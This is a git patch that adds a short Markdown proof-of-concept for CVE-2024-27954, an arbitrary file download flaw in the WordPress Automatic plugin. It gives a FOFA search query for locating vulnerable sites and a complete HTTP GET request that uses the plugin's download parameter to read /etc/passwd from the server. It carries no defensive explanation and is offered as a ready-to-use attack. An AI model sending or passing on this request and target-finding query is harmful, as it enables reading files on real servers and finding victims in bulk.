From 49422488274490d436f7b9c5f5c762dd3d1f967a Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 28 Mar 2024 19:40:56 +0800 Subject: [PATCH] =?UTF-8?q?Create=20WordPress=20Automatic=20Plugin?= =?UTF-8?q?=E4=BB=BB=E6=84=8F=E6=96=87=E4=BB=B6=E4=B8=8B=E8=BD=BD=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E(CVE-2024-27954).md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Plugin任意文件下载漏洞(CVE-2024-27954).md | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 WordPress Automatic Plugin任意文件下载漏洞(CVE-2024-27954).md diff --git a/WordPress Automatic Plugin任意文件下载漏洞(CVE-2024-27954).md b/WordPress Automatic Plugin任意文件下载漏洞(CVE-2024-27954).md new file mode 100644 index 0000000..846ae6a --- /dev/null +++ b/WordPress Automatic Plugin任意文件下载漏洞(CVE-2024-27954).md @@ -0,0 +1,19 @@ +## WordPress Automatic Plugin任意文件下载漏洞(CVE-2024-27954) + +## fofa +``` +"/wp-content/plugins/wp-automatic" +``` + +## poc +``` +GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 +Connection: close +Accept: */* +Accept-Language: en +Accept-Encoding: gzip +``` + +![8053915951936ca9109843fe4c581ce4](https://github.com/wy876/POC/assets/139549762/f5c6497f-29f9-47de-aa15-f072541a1d1b)